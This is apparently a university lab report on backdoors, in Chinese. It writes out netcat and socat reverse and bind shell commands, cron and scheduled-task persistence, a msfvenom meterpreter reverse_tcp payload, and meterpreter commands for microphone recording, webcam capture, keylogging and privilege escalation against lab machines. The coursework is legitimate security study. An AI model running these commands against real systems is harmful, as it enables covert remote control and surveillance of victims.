2017-2018-2 20155231《網絡對抗技術》實驗二:後門原理與實踐
2017-2018-2 20155231《網絡對抗技術》實驗二:後門原理與實踐
常用後門工具
一、Windows獲得Linux的Shell
在本機cmd
中使用ipconfig
獲得windows的IP地址
1.windows 打開監聽
2.Linux反彈連接win
nc(主機ip) 5231(所設置的端口) -e /bin/sh
3.windows下獲得一個linux shell,可運行任何指令,如ls
二、Linux獲得Win Shell
ifconfig
獲得虛擬機IP
1.Linux運行監聽指令
使用指令,nc -l -p 5231
,監聽5231端口
2.Windows反彈連接Linux
3.Linux下看到Windows的命令提示
三、使用nc傳輸數據
1.Windows下監聽5231端口:
2.Kali下連接到Windows的5231端口:
3.建立連接之後,就可以傳輸數據了:
實驗內容
一、使用netcat獲取主機操作Shell,cron啟動
先在Windows系統下,用ncat.exe -l -p 5231
,監聽端口
用crontab -e
指令編輯一條定時任務
在最後一行加入53* * * * /bin/netcat 10.1.1.141 5236 -e /bin/sh,意思是在每個小時的第53分鐘(為測試結果方便所選時間最好離現實時間較近)反向連接Windows主機的5231端口,就會啟動cron
到時間後,便獲得了Kali的shell,可以輸入指令
二、使用socat獲取主機操作Shell, 任務計劃啟動
在Windows系統下,打開控制面板->管理工具->任務計劃程序(可在控制面板直接搜索任務計劃),創建任務,填寫任務名稱後,新建一個觸發器
在操作->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5231 exec:cmd.exe,pty,stderr
,這個命令的作用是把cmd.exe綁定到端口5231,同時把cmd.exe的stderr重定向到stdout上:
創建完成之後,選擇運行
然後在Kali環境下輸入指令socat - tcp:IP(目標主機):5231
,這裏的第一個參數-代表標準的輸入輸出,第二個流連接到Windows主機的5231端口,此時可以發現已經成功獲得了一個cmd shell
三、使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell
輸入msfvenom -p windows/meterpreter/reverse_tcp LHOST=虛擬機IP LPORT=5231 -f exe > 20155231_backdoor.exe
生成後門程序
然後通過nc指令將生成的後門程序傳送到Windows主機上
windows:ncat.exe -l 5231 > 20155231_backdoor.exe
kali:nc IP(win) 5231 < 20155231.exe
在Kali上使用msfconsole指
令進入msf控制臺,
設置完成後,利用exploit
,執行監聽
在windows中,運行20155231_backdoor.exe
此時Kali上已經獲得了Windows主機的連接,並且得到了遠程控制的shell
四、使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權
- 使用record_mic指令可以截獲一段音頻
- 使用webcam_snap指令可以使用攝像頭進行拍照
- 使用webcam stream指令可以使用攝像頭進行錄像
使用screenshot指令可以進行截屏
- 使用keyscan_start指令開始記錄下擊鍵的過程,使用
keyscan_dump
指令讀取擊鍵的記錄 先使用getuid指令查看當前用戶,使用getsystem指令進行提權
基礎問題回答
(1)例舉你能想到的一個後門進入到你系統中的可能方式?
- 下載安裝軟件
(2)例舉你知道的後門如何啟動起來(win及linux)的方式?
- 直接啟動,定時啟動。
(3)Meterpreter有哪些給你映像深刻的功能?
- 更改獲得權限,打開目標主機攝像頭等控件
(4)如何發現自己有系統有沒有被安裝後門?
- 殺毒軟件,監控程序運行
實驗總結與體會
本次實驗,由於虛擬機網絡連接經常出現問題,借用了同學的虛擬機做實驗。學習使用了nc等後門工具。完成了使用MSF截屏、錄音等操作,提權失敗。
2017-2018-2 20155231《網絡對抗技術》實驗二:後門原理與實踐